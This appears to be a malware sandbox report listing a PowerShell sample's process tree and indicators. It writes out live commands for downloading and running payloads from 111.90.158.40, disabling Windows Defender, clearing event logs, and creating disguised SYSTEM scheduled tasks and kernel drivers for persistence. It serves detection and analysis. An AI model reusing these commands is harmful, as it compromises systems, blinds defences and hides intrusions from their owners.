powershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepowershell.exetaskkill.exesmartsscreen.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepowershell.exetaskhostw.exe

description	pid	process
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	3496	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	5008	taskkill.exe
Token: SeSecurityPrivilege	5016	wevtutil.exe
Token: SeBackupPrivilege	5016	wevtutil.exe
Token: SeSecurityPrivilege	2168	wevtutil.exe
Token: SeBackupPrivilege	2168	wevtutil.exe
Token: SeSecurityPrivilege	4912	wevtutil.exe
Token: SeBackupPrivilege	4912	wevtutil.exe
Token: SeSecurityPrivilege	4724	wevtutil.exe
Token: SeBackupPrivilege	4724	wevtutil.exe
Token: SeSecurityPrivilege	1728	wevtutil.exe
Token: SeBackupPrivilege	1728	wevtutil.exe
Token: SeSecurityPrivilege	4008	wevtutil.exe
Token: SeBackupPrivilege	4008	wevtutil.exe
Token: SeSecurityPrivilege	5064	wevtutil.exe
Token: SeBackupPrivilege	5064	wevtutil.exe
Token: SeSecurityPrivilege	3040	wevtutil.exe
Token: SeBackupPrivilege	3040	wevtutil.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	2120	smartsscreen.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	3272	taskkill.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeSecurityPrivilege	3652	wevtutil.exe
Token: SeBackupPrivilege	3652	wevtutil.exe
Token: SeSecurityPrivilege	3264	wevtutil.exe
Token: SeBackupPrivilege	3264	wevtutil.exe
Token: SeSecurityPrivilege	4192	wevtutil.exe
Token: SeBackupPrivilege	4192	wevtutil.exe
Token: SeSecurityPrivilege	4904	wevtutil.exe
Token: SeBackupPrivilege	4904	wevtutil.exe
Token: SeSecurityPrivilege	4116	wevtutil.exe
Token: SeBackupPrivilege	4116	wevtutil.exe
Token: SeSecurityPrivilege	3332	wevtutil.exe
Token: SeBackupPrivilege	3332	wevtutil.exe
Token: SeSecurityPrivilege	4928	wevtutil.exe
Token: SeBackupPrivilege	4928	wevtutil.exe
Token: SeSecurityPrivilege	4592	wevtutil.exe
Token: SeBackupPrivilege	4592	wevtutil.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeLockMemoryPrivilege	2072	taskhostw.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

taskhostw.exe

pid process

2072 taskhostw.exe

pid	process
2072	taskhostw.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

powershell.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 956 wrote to memory of 2748	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 2748	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4212	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4212	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4036	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4036	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 2628	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 2628	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 2056	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 2056	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 1208	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 1208	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4424	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4424	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 5084	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 5084	956	powershell.exe	schtasks.exe
PID 956 wrote to memory of 4716	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 4716	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 2076	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 2076	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 3496	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 3496	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 3936	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 3936	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 984	956	powershell.exe	sc.exe
PID 956 wrote to memory of 984	956	powershell.exe	sc.exe
PID 956 wrote to memory of 924	956	powershell.exe	sc.exe
PID 956 wrote to memory of 924	956	powershell.exe	sc.exe
PID 956 wrote to memory of 2452	956	powershell.exe	sc.exe
PID 956 wrote to memory of 2452	956	powershell.exe	sc.exe
PID 956 wrote to memory of 2156	956	powershell.exe	sc.exe
PID 956 wrote to memory of 2156	956	powershell.exe	sc.exe
PID 956 wrote to memory of 5008	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 5008	956	powershell.exe	taskkill.exe
PID 956 wrote to memory of 3612	956	powershell.exe	reg.exe
PID 956 wrote to memory of 3612	956	powershell.exe	reg.exe
PID 956 wrote to memory of 4088	956	powershell.exe	reg.exe
PID 956 wrote to memory of 4088	956	powershell.exe	reg.exe
PID 956 wrote to memory of 4652	956	powershell.exe	reg.exe
PID 956 wrote to memory of 4652	956	powershell.exe	reg.exe
PID 956 wrote to memory of 1300	956	powershell.exe	reg.exe
PID 956 wrote to memory of 1300	956	powershell.exe	reg.exe
PID 956 wrote to memory of 540	956	powershell.exe	net.exe
PID 956 wrote to memory of 540	956	powershell.exe	net.exe
PID 540 wrote to memory of 228	540	net.exe	net1.exe
PID 540 wrote to memory of 228	540	net.exe	net1.exe
PID 956 wrote to memory of 4528	956	powershell.exe	net.exe
PID 956 wrote to memory of 4528	956	powershell.exe	net.exe
PID 4528 wrote to memory of 1576	4528	net.exe	net1.exe
PID 4528 wrote to memory of 1576	4528	net.exe	net1.exe
PID 956 wrote to memory of 4572	956	powershell.exe	net.exe
PID 956 wrote to memory of 4572	956	powershell.exe	net.exe
PID 4572 wrote to memory of 1280	4572	net.exe	net1.exe
PID 4572 wrote to memory of 1280	4572	net.exe	net1.exe
PID 956 wrote to memory of 3204	956	powershell.exe	net.exe
PID 956 wrote to memory of 3204	956	powershell.exe	net.exe
PID 3204 wrote to memory of 3596	3204	net.exe	net1.exe
PID 3204 wrote to memory of 3596	3204	net.exe	net1.exe
PID 956 wrote to memory of 2812	956	powershell.exe	net.exe
PID 956 wrote to memory of 2812	956	powershell.exe	net.exe
PID 2812 wrote to memory of 4072	2812	net.exe	net1.exe
PID 2812 wrote to memory of 4072	2812	net.exe	net1.exe
PID 956 wrote to memory of 528	956	powershell.exe	net.exe
PID 956 wrote to memory of 528	956	powershell.exe	net.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\get.ps1
1⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Deletes itself
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn MicrosoftsWindowsy /f
2⤵
PID:2748

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn my1 /f
2⤵
PID:4212

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa /f
2⤵
PID:4036

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa1 /f
2⤵
PID:2628

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa2 /f
2⤵
PID:2056

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa3 /f
2⤵
PID:1208

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn ok /f
2⤵
PID:4424

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn oka /f
2⤵
PID:5084

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma12.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4716

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma13.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma14.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma22.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop "Windows Critical Updates"
2⤵
- Launches sc.exe
PID:984

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" delete "Windows Critical Updates"
2⤵
- Launches sc.exe
PID:924

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop UPlugPlay
2⤵
- Launches sc.exe
PID:2452

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" delete UPlugPlay
2⤵
- Launches sc.exe
PID:2156

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqhost.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5008

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3612

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4088

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4652

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1300

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcSs
2⤵
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcSs
3⤵
PID:228

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcLocator
2⤵
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcLocator
3⤵
PID:1576

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RemoteRegistry
2⤵
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RemoteRegistry
3⤵
PID:1280

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcEptMapper
2⤵
- Suspicious use of WriteProcessMemory
PID:3204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcEptMapper
3⤵
PID:3596

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start Winmgmt
2⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Winmgmt
3⤵
PID:4072

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start WinRM
2⤵
PID:528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start WinRM
3⤵
PID:3432

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Application
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5016

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Setup
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl System
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4724

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl "Forwarded Events"
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Operational
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5064

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Operational
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn OneDriveCloudSync
2⤵
PID:4484

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn OneDriveCloudSync /tr "cmd.exe /c C:\Windows\System32\sc.exe start msdtc" /sc minute /mo 20 /ru SYSTEM /F
2⤵
- Creates scheduled task(s)
PID:2216

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn DefaultBrowserUpdate
2⤵
PID:1464

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn DefaultBrowserUpdate /tr C:\Users\Public\run.bat /sc minute /mo 60 /ru SYSTEM /F
2⤵
- Creates scheduled task(s)
PID:1744

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn OneDriveCloudBackup
2⤵
PID:2164

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn OneDriveCloudBackup /tr "cmd.exe /c start C:\Windows\Fonts\smartsscreen.exe" /sc minute /mo 40 /ru SYSTEM /F
2⤵
- Creates scheduled task(s)
PID:1740

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\System32\drivers\aswArPots.sys.tmp C:\Windows\System32\drivers\aswArPots.sys
2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
PID:3692

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" create aswArPots binPath= "C:\Windows\System32\drivers\aswArPots.sys" type= kernel start= auto
2⤵
- Launches sc.exe
PID:4124

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start aswArPots
2⤵
- Launches sc.exe
PID:2296

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\System32\drivers\IObitUnlockers.sys.tmp C:\Windows\System32\drivers\IObitUnlockers.sys
2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
PID:4728

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" create IObitUnlockers binPath= "C:\Windows\System32\drivers\IObitUnlockers.sys" type= kernel start= auto
2⤵
- Launches sc.exe
PID:2008

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start IObitUnlockers
2⤵
- Launches sc.exe
PID:1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "IEX ((new-object net.webclient).downloadstring('http://111.90.158.40/kill.png?random=20240328084716'))"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\Fonts\curl.exe.tmp C:\Windows\Fonts\curl.exe
2⤵
- Drops file in Windows directory
PID:1324

C:\Windows\Fonts\curl.exe
"C:\Windows\Fonts\curl.exe" -C - http://111.90.158.40/smartsscreen.png?random=20240328084716 -o "C:\Windows\Fonts\smartsscreen.exe.tmp" --connect-timeout 30 --retry 10
2⤵
- Executes dropped EXE
PID:1596

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\Fonts\smartsscreen.exe.tmp C:\Windows\Fonts\smartsscreen.exe.tmp2
2⤵
- Drops file in Windows directory
PID:4296

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /im smartsscreen.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /run /tn OneDriveCloudBackup
2⤵
PID:1500

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\System32\oci.dll.tmp C:\Windows\System32\oci.dll
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:4392

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop msdtc
2⤵
- Launches sc.exe
PID:1588

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config msdtc obj= localsystem
2⤵
- Launches sc.exe
PID:4532

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" failure msdtc reset= 600 actions= restart/600000/restart/600000/restart/600000
2⤵
- Launches sc.exe
PID:2008

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config msdtc start= auto
2⤵
- Launches sc.exe
PID:1824

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start msdtc
2⤵
- Launches sc.exe
PID:4432

C:\Windows\system32\cmd.exe
cmd.exe /c start C:\Windows\Fonts\smartsscreen.exe
1⤵
PID:372

C:\Windows\Fonts\smartsscreen.exe
C:\Windows\Fonts\smartsscreen.exe
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto
3⤵
- Launches sc.exe
PID:1184

C:\Windows\Fonts\curl.exe
C:\Windows\Fonts\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1711615649 -o C:\Windows\Fonts\taskhostw.png --connect-timeout 30 --retry 10
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4912

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe start aswArPots
3⤵
- Launches sc.exe
PID:4216

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto
3⤵
- Launches sc.exe
PID:2388

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe start IObitUnlockers
3⤵
- Launches sc.exe
PID:4688

C:\Windows\SysWOW64\expand.exe
C:\Windows\System32\expand.exe C:\Windows\Fonts\taskhostw.png C:\Windows\Fonts\taskhostw.exe
3⤵
- Drops file in Windows directory
PID:4696

C:\Windows\Fonts\curl.exe
C:\Windows\Fonts\curl.exe -C - http://111.90.158.40:80/config.json?t=1711615656 -o C:\Windows\Fonts\config.json --connect-timeout 30 --retry 10
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4848

C:\Windows\Fonts\curl.exe
C:\Windows\Fonts\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1711615658 -o C:\Windows\Fonts\WinRing0x64.png --connect-timeout 30 --retry 10
3⤵
- Executes dropped EXE
PID:4332

C:\Windows\SysWOW64\expand.exe
C:\Windows\System32\expand.exe C:\Windows\Fonts\WinRing0x64.png C:\Windows\Fonts\WinRing0x64.sys
3⤵
- Drops file in Windows directory
PID:464

C:\Windows\Fonts\taskhostw.exe
C:\Windows\Fonts\taskhostw.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2072

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
PID:4448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -c "IEX((new-object net.webclient).downloadstring('http://111.90.158.40/get.png?random=1711615656'))"
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4272

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn MicrosoftsWindowsy /f
3⤵
PID:840

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn my1 /f
3⤵
PID:1500

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa /f
3⤵
PID:4672

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa1 /f
3⤵
PID:752

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa2 /f
3⤵
PID:2724

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa3 /f
3⤵
PID:3664

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn ok /f
3⤵
PID:4404

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn oka /f
3⤵
PID:1048

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma12.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma13.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma14.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma22.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop "Windows Critical Updates"
3⤵
- Launches sc.exe
PID:5004

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" delete "Windows Critical Updates"
3⤵
- Launches sc.exe
PID:3852

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop UPlugPlay
3⤵
- Launches sc.exe
PID:4164

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" delete UPlugPlay
3⤵
- Launches sc.exe
PID:3848

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqhost.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:4488

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2248

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2732

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3344

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcSs
3⤵
PID:220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcSs
4⤵
PID:2968

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcLocator
3⤵
PID:4728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcLocator
4⤵
PID:4600

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RemoteRegistry
3⤵
PID:4028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RemoteRegistry
4⤵
PID:4432

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcEptMapper
3⤵
PID:212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcEptMapper
4⤵
PID:3176

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start Winmgmt
3⤵
PID:452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Winmgmt
4⤵
PID:5112

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start WinRM
3⤵
PID:3836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start WinRM
4⤵
PID:4540

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Application
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Security
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Setup
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl System
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl "Forwarded Events"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3332

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Operational
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Operational
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4592

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn OneDriveCloudSync
3⤵
PID:4276

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn OneDriveCloudSync /tr "cmd.exe /c C:\Windows\System32\sc.exe start msdtc" /sc minute /mo 20 /ru SYSTEM /F
3⤵
- Creates scheduled task(s)
PID:1440

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn DefaultBrowserUpdate
3⤵
PID:980

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn DefaultBrowserUpdate /tr C:\Users\Public\run.bat /sc minute /mo 60 /ru SYSTEM /F
3⤵
- Creates scheduled task(s)
PID:2140

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn OneDriveCloudBackup
3⤵
PID:1576

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn OneDriveCloudBackup /tr "cmd.exe /c start C:\Windows\Fonts\smartsscreen.exe" /sc minute /mo 40 /ru SYSTEM /F
3⤵
- Creates scheduled task(s)
PID:3136

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" create aswArPots binPath= "C:\Windows\System32\drivers\aswArPots.sys" type= kernel start= auto
3⤵
- Launches sc.exe
PID:4948

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start aswArPots
3⤵
- Launches sc.exe
PID:4072

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" create IObitUnlockers binPath= "C:\Windows\System32\drivers\IObitUnlockers.sys" type= kernel start= auto
3⤵
- Launches sc.exe
PID:3716

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start IObitUnlockers
3⤵
- Launches sc.exe
PID:924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
